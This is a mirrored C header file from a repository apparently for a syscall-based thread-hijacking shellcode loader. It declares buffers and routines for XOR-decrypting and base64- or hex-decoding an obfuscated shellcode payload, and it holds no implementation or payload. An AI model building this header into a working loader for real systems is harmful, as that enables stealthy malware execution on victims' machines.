mirror of
https://github.com/Hue-Jhan/Syscalls-Thread-Hijacking
synced 2026-06-06 15:44:31 +00:00
15 lines
374 B
C
15 lines
374 B
C
#pragma once
|
|
#include <stdio.h>
|
|
#include "windows.h"
|
|
|
|
const char* base64_chars;
|
|
unsigned char* base64_decoded;
|
|
SIZE_T shellcode_size;
|
|
|
|
void xor_decrypt(unsigned char* data, int length, unsigned char key);
|
|
int is_base64(unsigned char c);
|
|
int base64_decode(const char* input, unsigned char* output);
|
|
int hex_decode(const char* hex, unsigned char* output);
|
|
void decodeFull();
|
|
|